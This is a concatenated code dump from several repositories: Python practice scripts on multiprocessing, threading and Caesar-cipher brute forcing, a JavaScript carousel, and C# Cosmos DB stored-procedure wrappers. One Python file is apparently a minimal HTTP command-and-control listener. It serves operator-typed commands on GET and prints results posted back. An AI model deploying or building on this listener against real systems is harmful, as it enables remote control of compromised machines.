p2.start()
p1.join()
p2.join()
logging.debug(l)
logging.debug(d)
logging.debug(n)
def main():
# f()
# f2()
# sample_lock()
# sample_pipe()
# sample_value_array()
sample_manager()
if __name__ == '__main__':
main()
<file_sep>import time
import threading
def thread(num):
print("Thread Start {}".format(num))
time.sleep(2)
print("Thread End {}".format(num))
def sample():
for i in range(1, 4):
threading.Thread(target=thread, name="th", args=(i,)).start()
def main():
sample()
if __name__ == '__main__':
main()
<file_sep>import http.server
HOST = "Your Server is here"
PORT = 8080
class RequestHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
command = input("[Prompt]> ")
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(command.encode())
def do_POST(self):
self.send_response(200)
self.end_headers()
length = int(self.headers['Content-length'])
res_body = self.rfile.read(length)
print(res_body.decode())
def main():
http_server = http.server.HTTPServer
httpd = http_server((HOST, PORT), RequestHandler)
try:
httpd.serve_forever()
except KeyboardInterrupt:
print('[!] Stopped.')
httpd.server_close()
if __name__ == "__main__":
main()
<file_sep>def decrypt(cipher_text, key):
ret = ""
for ch in list(cipher_text):
if 'A' <= ch <= 'Z':
ret += chr((ord(ch) - ord('A') + key) % 26 + ord('A'))
elif 'a' <= ch <= 'z':
ret += chr((ord(ch) - ord('a') + key) % 26 + ord('a'))
else:
ret += ch
return ret
def main():
cipher_text = input("Enter Caesar cipher : ")
for i in range(1, 26):
print('{0:2d}'.format(i) + " : " + decrypt(cipher_text, i))
if __name__ == '__main__':
main() | eb02bb05c15e8195dafcd346123183f613c9452c | [
"Markdown",
"Python"
] | 11 | Python | SILKYMAJOR/practice_python | 7020914e2fba47b122a0d528d903008ff6738cd0 | beed451bdfa2eefac86af0df37c16cb2b9842948 |
refs/heads/master | <file_sep>/**
* Created by Administrator on 2017/2/11.
*/
var carousel = document.getElementById('carousel');
console.log(carousel);
//获取相框宽度
var cWidth = carousel.clientWidth;
console.log(cWidth);
//获得所有图片,根据图片的索引设置每张图片的位置。
var imgs = $('img');
console.log(imgs);
for (let i = 0; i < imgs.length; i++) {
imgs[i].style.left = i * cWidth + 'px';
}
//定义一个变量,用于记录当前显示的是第几页。
var page = 0;
//开启定时器,每隔1秒,让所有图片向左移动640像素(图大小)。
var timer = setInterval(moveLeft, 3000);
//向左移动函数
function moveLeft() {
page++;
if (page > imgs.length - 1) {
page = imgs.length - 1;
}
move()
}
//向右移动函数
function moveRight() {
page--;
if (page < 0) {
page = 0
}
move()
}
//轮播图移动函数
function move() {
for (var i = 0; i < imgs.length; i++) {
//根据当前显示页数,计算出每张图片的位置
imgs[i].style.left = (i - page) * cWidth + 'px';
}
setTimeout(function () {
//一秒之后,动画结束,首先判断这是不是最后一张,
//如果是最后一张,则瞬间回到第0页(不带动画),
//并把page设置为0.
if (page == imgs.length - 1) {
page = 0;
//先把所有的imgs 的过渡取消(回到第一张不需要动画)
for (var j = 0; j < imgs.length; j++) {
imgs[j].style.transition = 'none';
}
//把所有的图片回归初始位置
for (var j = 0; j < imgs.length; j++) {
imgs[j].style.left = (j - page) * cWidth + 'px';
}
//3s之后,再把所有imgs的过渡添加上,如果不写3s的延迟
//那么在下次ui刷新之前imgs的过渡就已经添加了,会导致imgs回归
//原位置时还是带动画。
setTimeout(function () {
for (var j = 0; j < imgs.length; j++) {
imgs[j].style.transition = "left 0.7s ease-in-out";
}
}, 100)
}
//然后,不管是不是最后一张,都需要改变小白点的位置
pageC.setPage(page);
}, 700);
}
//~~~~~~~~~~~~~~~设置小白点~~~~~~~~~~~~~
var cHeight = carousel.clientHeight;
//设置白点的位置
var pageC = document.querySelectorAll('.pageControl');
console.log(pageC);
for (var i = 0; i < pageC.length; i++) {
//给每一个小圆点div设置一个索引,这样当小圆点点击时,
//我们就可以通过事件的target确定时哪个小圆点被点击,
//再通过小圆点的索引就能知道第几个被点击。
pageC[i].index = i;
pageC[i].style.top = '90%';
pageC[i].style.left = (cWidth / 2 + i * 20) - (pageC.length * 10 + (pageC.length - 1) * 10) / 2 + "px";
pageC[i].onclick = function (e) {
//当某个小圆点被点击时,就把当前页数设置为小圆点的索引
page = e.target.index;
//执行移动函数
move();
//为了保证每次通过小圆点手动翻页后不立刻执行定时器
//翻页,先把定时器关闭,再打开,这样定时器就会
//重新计时。
clearInterval(timer);
timer = setInterval(moveLeft, 3000);
}
}
//为pageC对象添加一个函数,用于设置当前的页数(哪个小白点变白)
pageC.setPage = function (p) {
//先把所有小白点都变透明
for (var i = 0; i < this.length; i++) {
this[i].style.backgroundColor = "";
}
//再把当前页的小白点变白。
this[p].style.backgroundColor = "black";
};
pageC.setPage(0);
//~~~~~~~~~~~~~~~设置左右箭头~~~~~~~~~~~~~~~~
var leftArrow = document.createElement('div');
leftArrow.classList.add("arrow");
leftArrow.innerHTML = "<<";
carousel.appendChild(leftArrow);
leftArrow.style.background = "linear-gradient(to right,rgba(0,0,0,0.5),rgba(0,0,0,0))";
var rightArrow = document.createElement('div');
rightArrow.classList.add("arrow");
rightArrow.innerHTML = ">>";
carousel.appendChild(rightArrow);
rightArrow.style.right = "0";
rightArrow.style.background = "linear-gradient(to left,rgba(0,0,0,0.5),rgba(0,0,0,0))";
leftArrow.onclick = function () {
clearInterval(timer);
timer = setInterval(moveLeft, 3000);
moveRight();
};
rightArrow.onclick = function () {
clearInterval(timer);
timer = setInterval(moveLeft, 3000);
moveLeft();
};
| e479e5f3c4628b17d66ca95640c31b840c4fe460 | [
"JavaScript"
] | 1 | JavaScript | ChenJIE1993/js--Carousel-figure | 9f6ed2ad7aaaba4c700c3886d1783830e807dcd5 | a698173c440ca9a4e1cefebe41f2d0a85f555765 |
refs/heads/master | <file_sep>//instead of using a database I use a simple array to track what users are in a room and how this state changes.
const users = [];
const addUser = ({id, name, room}) => {
//to have a specific format: from <NAME> to johnkoukoulakis
name = name.trim().toLowerCase();
room = room.trim().toLowerCase();
//to check if a user with the same name exists in the same room
const existingUser = users.find((user) => user.room === room && user.name === name);
//if truthy returns an error object and exits addUser function
if(!name || !room) return {error: 'Username and room are required'};
if(existingUser) return { error: 'Username is already taken'};
//else adds an object with all the parameters in the users array and exits
const user = { id, name, room };
users.push(user);
console.log(user)
return {user};
};
const removeUser = (id) => {
//finds where is the user with the id we are looking for
//and if it's inside the array we remove the user onject from the array
const index = users.findIndex((user) => user.id === id);
if(index !== -1) {
return users.splice(index, 1)[0];
}
};
const getUser = (id) => users.find((user) => user.id === id);
const getUsersInRoom = (room) => users.filter((user) => user.room === room);
module.exports = { addUser, removeUser, getUser, getUsersInRoom }; | 77dfdb02b1adcde232ad57e905231f4173b3005d | [
"JavaScript"
] | 1 | JavaScript | koukoujohn/react-chat-app | 27f53fa56b2801901d4f096f3a043e07c716d0ca | f777dca09dda2776966cfe4100f6b4419665e4c0 |
refs/heads/master | <repo_name>getditto/Inventory-Sample-App<file_sep>/flight-inventory/Model/FlightInfo.swift
import Foundation
struct FlightInfo {
let name: String
}
<file_sep>/flight-inventory/Model/UserInfo.swift
import Foundation
struct UserInfo {
let name: String
let isAdmin: Bool
}
<file_sep>/flight-inventory/Inventory/InventoryTableViewCell.swift
import UIKit
final class InventoryTableViewCell: UITableViewCell {
@IBOutlet private(set) weak var nameLabel: UILabel!
@IBOutlet private(set) weak var countLabel: UILabel!
@IBOutlet private(set) weak var stepper: CustomStepper! {
didSet {
stepper.minimumValue = 0
stepper.maximumValue = 99
}
}
}
final class CustomStepper: UIStepper {
var indexPath: IndexPath?
}
<file_sep>/flight-inventory/Connection/ConnectionTableViewCell.swift
import UIKit
final class ConnectionTableViewCell: UITableViewCell {
@IBOutlet private(set) weak var deviceNameLabel: UILabel!
@IBOutlet private(set) weak var connectionTypeLabel: UILabel!
}
<file_sep>/flight-inventory/FlightList/FlightListViewController.swift
import UIKit
final class FlightListViewController: UIViewController {
@IBOutlet private var flightButtons: [UIButton]!
private let userInfo: UserInfo
init?(coder: NSCoder, userInfo: UserInfo) {
self.userInfo = userInfo
super.init(coder: coder)
}
required init?(coder: NSCoder) {
fatalError()
}
override func viewDidLoad() {
super.viewDidLoad()
setupUI()
}
private func setupUI() {
title = "Flight List"
flightButtons.forEach {
$0.layer.cornerRadius = 8
$0.addTarget(self, action: #selector(didTapFlightButton), for: .touchUpInside)
}
}
@objc private func didTapFlightButton(_ sender: UIButton) {
let flightInfo = FlightInfo(name: sender.titleLabel?.text ?? "")
let sb = UIStoryboard(name: "Inventory", bundle: nil)
let destination = sb.instantiateInitialViewController { coder in
InventoryViewController(coder: coder, userInfo: self.userInfo, flightInfo: flightInfo)
}
if let destination = destination {
navigationController?.pushViewController(destination, animated: true)
}
}
}
<file_sep>/flight-inventory/Inventory/InventoryViewController.swift
import UIKit
import DittoSwift
final class InventoryViewController: UIViewController {
@IBOutlet private weak var tableView: UITableView!
private let userInfo: UserInfo
private let flightInfo: FlightInfo
private var liveQuery: DittoLiveQuery?
private var inventories = [DittoDocument]()
private var collection: DittoCollection {
return DittoHandler.ditto.store.collection(flightInfo.name)
}
init?(coder: NSCoder, userInfo: UserInfo, flightInfo: FlightInfo) {
self.userInfo = userInfo
self.flightInfo = flightInfo
super.init(coder: coder)
}
required init?(coder: NSCoder) {
fatalError()
}
override func viewDidLoad() {
super.viewDidLoad()
setupUI()
observe()
}
override func viewWillAppear(_ animated: Bool) {
super.viewWillAppear(animated)
observe()
}
override func viewWillDisappear(_ animated: Bool) {
super.viewWillDisappear(animated)
liveQuery?.stop()
liveQuery = nil
}
private func setupUI() {
title = flightInfo.name
let nib = UINib(nibName: "InventoryTableViewCell", bundle: nil)
tableView.register(nib, forCellReuseIdentifier: "InventoryTableViewCell")
tableView.tableFooterView = UIView()
tableView.delegate = self
tableView.dataSource = self
navigationItem.rightBarButtonItem = UIBarButtonItem(
image: UIImage(systemName: "ellipsis"),
style: .done,
target: self,
action: #selector(didTapMore)
)
}
private func observe() {
liveQuery = collection.findAll().observe { [weak self] docs, event in
guard let self = self else { return }
self.inventories = docs
self.tableView.reloadData()
}
}
@objc private func didTapStepper(_ sender: CustomStepper) {
guard let indexPath = sender.indexPath else { return }
let newCount = sender.value
let inventory = inventories[indexPath.row]
let oldCount = Double(inventory["count"].intValue)
let gap = newCount - oldCount
collection.findByID(inventory.id).update { doc in
doc?["count"].replaceWithCounter()
doc?["count"].increment(amount: gap)
}
tableView.reloadRows(at: [indexPath], with: .none)
}
}
extension InventoryViewController: UITableViewDelegate, UITableViewDataSource {
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return inventories.count
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
let cell = tableView.dequeueReusableCell(withIdentifier: "InventoryTableViewCell", for: indexPath) as! InventoryTableViewCell
let inventory = inventories[indexPath.row]
cell.nameLabel.text = inventory["name"].stringValue
let count = inventory["count"].intValue
cell.countLabel.text = String(count)
cell.stepper.addTarget(self, action: #selector(didTapStepper), for: .valueChanged)
cell.stepper.indexPath = indexPath
cell.stepper.value = Double(count)
return cell
}
}
// MARK: - More Button
extension InventoryViewController {
@objc private func didTapMore() {
let alert = UIAlertController(title: nil, message: nil, preferredStyle: .actionSheet)
alert.addAction(UIAlertAction(title: "Add Inventory", style: .default) { _ in
self.didTapAdd()
})
alert.addAction(UIAlertAction(title: "Show Connection", style: .default) { _ in
self.didTapConnection()
})
alert.addAction(UIAlertAction(title: "Remove All Inventory", style: .destructive) { _ in
self.didTapRemoveAll()
})
alert.addAction(UIAlertAction(title: "Logout", style: .destructive) { _ in
self.didTapLogout()
})
if UIDevice.current.userInterfaceIdiom == .pad {
alert.popoverPresentationController?.sourceView = view
alert.popoverPresentationController?.sourceRect = CGRect(x: view.bounds.midX, y: view.bounds.midY, width: 0, height: 0)
alert.popoverPresentationController?.permittedArrowDirections = []
}
present(alert, animated: true)
}
@objc private func didTapAdd() {
guard userInfo.isAdmin else {
showNonAdminAlert(); return
}
let alert = UIAlertController(title: "New Inventory", message: nil, preferredStyle: .alert)
alert.addAction(UIAlertAction(title: "Cancel", style: .cancel))
alert.addAction(UIAlertAction(title: "OK", style: .default) { [weak self] _ in
guard let self = self else { return }
guard let text = alert.textFields?.first?.text else { return }
guard !text.isEmpty else {
self.didTapAdd(); return
}
let docID = try? self.collection.insert(
["name": text, "count": 0]
)
if let docID = docID {
self.collection.findByID(docID).update { doc in
doc?["count"].replaceWithCounter(isDefault: true)
}
}
self.tableView.reloadData()
})
alert.addTextField { field in
field.placeholder = "New inventory name"
field.keyboardType = .default
}
present(alert, animated: true)
}
@objc private func didTapRemoveAll() {
guard userInfo.isAdmin else {
showNonAdminAlert(); return
}
let alert = UIAlertController(
title: "Do you want to remove all?",
message: nil,
preferredStyle: .alert
)
alert.addAction(UIAlertAction(title: "Cancel", style: .cancel))
alert.addAction(UIAlertAction(title: "OK", style: .destructive) { [weak self] _ in
guard let self = self else { return }
self.collection.findAll().remove()
})
present(alert, animated: true)
}
@objc private func didTapConnection() {
let sb = UIStoryboard(name: "Connections", bundle: nil)
let destination = sb.instantiateInitialViewController { coder in
ConnectionListViewController(coder: coder)
}
if let destination = destination {
navigationController?.pushViewController(destination, animated: true)
}
}
@objc private func didTapLogout() {
navigationController?.popToRootViewController(animated: true)
}
private func showNonAdminAlert() {
let alert = UIAlertController(
title: "Editing is only allowed to admin",
message: nil,
preferredStyle: .alert
)
alert.addAction(UIAlertAction(title: "OK", style: .cancel))
present(alert, animated: true)
}
}
<file_sep>/README.md
# Inventory-Sample-App
Sample inventory app using DittoSyncKit
`pod install --repo-update` to launch the project.
||||
|--|--|--|
||||
||||
<file_sep>/flight-inventory/DittoHandler.swift
import Foundation
import DittoSwift
final class DittoHandler {
private static let accessLicense = "Insert your access license!"
static private(set) var ditto: Ditto = {
// You can set a log level
DittoLogger.minimumLogLevel = .debug
// App name for the Ditto SDK
// `let ditto = Ditto()`
let ditto = Ditto(identity: .development(appName: "live.ditto.flight-inventory"))
// Set your access license
ditto.setAccessLicense(DittoHandler.accessLicense)
// Choose sync transports. Adding all is recommended for the best performance!
ditto.start(transports: [.awdl, .bluetooth, .wifi])
return ditto
}()
}
<file_sep>/flight-inventory/Model/Connection.swift
import Foundation
struct Connection {
let deviceName: String
let connectionType: String
}
<file_sep>/flight-inventory/Connection/ConnectionListViewController.swift
import UIKit
import DittoSwift
final class ConnectionListViewController: UIViewController {
@IBOutlet private weak var tableView: UITableView!
private var connections = [Connection]()
private var peerObserver: DittoPeersObserver?
override func viewDidLoad() {
super.viewDidLoad()
setupUI()
observePeers()
}
override func viewWillDisappear(_ animated: Bool) {
super.viewWillDisappear(animated)
peerObserver = nil
}
private func setupUI() {
title = "Connections"
let nib = UINib(nibName: "ConnectionTableViewCell", bundle: nil)
tableView.register(nib, forCellReuseIdentifier: "ConnectionTableViewCell")
tableView.tableFooterView = UIView()
tableView.delegate = self
tableView.dataSource = self
}
private func observePeers() {
peerObserver = DittoHandler.ditto.observePeers { [weak self] peers in
guard let self = self else { return }
self.connections = []
peers.forEach { peer in
peer.connections.forEach {
let connection = Connection(deviceName: peer.deviceName, connectionType: $0)
self.connections.append(connection)
}
}
self.tableView.reloadData()
}
}
}
extension ConnectionListViewController: UITableViewDelegate, UITableViewDataSource {
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return connections.count
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
let cell = tableView.dequeueReusableCell(withIdentifier: "ConnectionTableViewCell", for: indexPath) as! ConnectionTableViewCell
let connection = connections[indexPath.row]
cell.deviceNameLabel?.text = connection.deviceName
cell.connectionTypeLabel?.text = connection.connectionType
return cell
}
}
<file_sep>/flight-inventory/Login/LoginViewController.swift
import UIKit
import DittoSwift
final class LoginViewController: UIViewController {
@IBOutlet private weak var usernameTextField: UITextField!
@IBOutlet private weak var adminSwitch: UISwitch!
@IBOutlet private weak var loginButton: UIButton!
private var isAdmin = false
override func viewDidLoad() {
super.viewDidLoad()
setupUI()
}
private func setupUI() {
title = "Login"
loginButton.addTarget(self, action: #selector(didTapLogin), for: .touchUpInside)
loginButton.layer.cornerRadius = 8
}
@objc private func didTapLogin() {
guard let username = usernameTextField.text else {
showEmptyUsernameAlert(); return
}
guard !username.isEmpty else {
showEmptyUsernameAlert(); return
}
Ditto.deviceName = username
let userInfo = UserInfo(name: username, isAdmin: adminSwitch.isOn)
let sb = UIStoryboard(name: "Flight", bundle: nil)
let destination = sb.instantiateInitialViewController { coder in
FlightListViewController(coder: coder, userInfo: userInfo)
}
if let destination = destination {
navigationController?.pushViewController(destination, animated: true)
}
}
@objc private func showEmptyUsernameAlert() {
let alert = UIAlertController(
title: "Username is Empty",
message: nil,
preferredStyle: .alert
)
alert.addAction(UIAlertAction(title: "OK", style: .cancel))
present(alert, animated: true)
}
}
| c9047acca09a0950cc9ddc7948421b072eac7f3c | [
"Swift",
"Markdown"
] | 11 | Swift | getditto/Inventory-Sample-App | baa3ede1ab28e5bf050526cbed06bc7f068288e8 | c3e788f0ccb2b5ba050ab09913e8802083315373 |
refs/heads/master | <file_sep>using CosmosDbRepository;
using CosmosDbRepository.Types;
using FluentAssertions;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
namespace CosmosDbRepositoryTest
{
[TestClass]
public class CosmosDocumentIdTest
{
[TestMethod]
public void GuidIdTests()
{
Guid value = Guid.NewGuid();
DocumentId id = value;
(id == value).Should().BeTrue();
(id != value).Should().BeFalse();
id.Equals(value).Should().BeTrue();
id.Equals((object)value).Should().BeTrue();
}
[TestMethod]
public void StringIdTests()
{
string value = "MyId";
DocumentId id = value;
(id == value).Should().BeTrue();
(id != value).Should().BeFalse();
id.Equals(value).Should().BeTrue();
id.Equals((object)value).Should().BeTrue();
}
[TestMethod]
public void IntIdTests()
{
int value = 123;
DocumentId id = value;
(id == value).Should().BeTrue();
(id != value).Should().BeFalse();
id.Equals(value).Should().BeTrue();
id.Equals((object)value).Should().BeTrue();
}
}
}
<file_sep>using Microsoft.Azure.Documents.Client;
using System.Threading.Tasks;
namespace CosmosDbRepository
{
public interface ICosmosDb
{
Task<string> SelfLinkAsync { get; }
ICosmosDbRepository<T> Repository<T>();
ICosmosDbRepository<T> Repository<T>(string id);
Task<bool> DeleteAsync(RequestOptions options = null);
// If you do not call init then the database and repositories
// will be constructed as needed
Task Init();
}
}
<file_sep>using Microsoft.Azure.Documents;
using Newtonsoft.Json;
using System;
using System.Threading.Tasks;
namespace CosmosDbRepository.Implementation
{
internal abstract class StoreProcedureImpl
{
protected readonly IDocumentClient Client;
protected readonly AsyncLazy<Uri> StoredProcUri;
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
{
Client = client;
StoredProcUri = new AsyncLazy<Uri>(() => GetStoredProcUri(repository, id));
}
private async Task<Uri> GetStoredProcUri(ICosmosDbRepository repository, string id)
{
return new Uri($"{await repository.AltLink}/sprocs/{Uri.EscapeUriString(id)}", UriKind.Relative);
}
}
internal class StoreProcedureImpl<TResult>
: StoreProcedureImpl
, IStoredProcedure<TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
public async Task<TResult> ExecuteAsync()
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value);
}
}
internal class StoreProcedureImpl<TParam, TResult>
: StoreProcedureImpl
, IStoredProcedure<TParam, TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
public async Task<TResult> ExecuteAsync(TParam param)
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param);
}
}
internal class StoreProcedureImpl<TParam1, TParam2, TResult>
: StoreProcedureImpl
, IStoredProcedure<TParam1, TParam2, TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2)
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2);
}
}
internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TResult>
: StoreProcedureImpl
, IStoredProcedure<TParam1, TParam2, TParam3, TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3)
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3);
}
}
internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TResult>
: StoreProcedureImpl
, IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4)
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4);
}
}
internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TResult>
: StoreProcedureImpl
, IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5)
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5);
}
}
internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TResult>
: StoreProcedureImpl
, IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6)
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6);
}
}
internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TResult>
: StoreProcedureImpl
, IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7)
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7);
}
}
internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TResult>
: StoreProcedureImpl
, IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8)
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8);
}
}
internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TResult>
: StoreProcedureImpl
, IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9)
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8, param9);
}
}
internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TResult>
: StoreProcedureImpl
, IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10)
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8, param9, param10);
}
}
internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TResult>
: StoreProcedureImpl
, IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11)
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8, param9, param10, param11);
}
}
internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TResult>
: StoreProcedureImpl
, IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12)
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8, param9, param10, param11, param12);
}
}
internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TResult>
: StoreProcedureImpl
, IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12, TParam13 param13)
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8, param9, param10, param11, param12, param13);
}
}
internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TResult>
: StoreProcedureImpl
, IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12, TParam13 param13, TParam14 param14)
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8, param9, param10, param11, param12, param13, param14);
}
}
internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TResult>
: StoreProcedureImpl
, IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
public async Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12, TParam13 param13, TParam14 param14, TParam15 param15)
{
return await Client.ExecuteStoredProcedureAsync<TResult>(await StoredProcUri.Value, param1, param2, param3, param4, param5, param6, param7, param8, param9, param10, param11, param12, param13, param14, param15);
}
}
internal class StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TParam16, TResult>
: StoreProcedureImpl
, IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TParam16, TResult>
{
public StoreProcedureImpl(IDocumentClient client, ICosmosDbRepository repository, string id)
: base(client, repository, id)
{
}
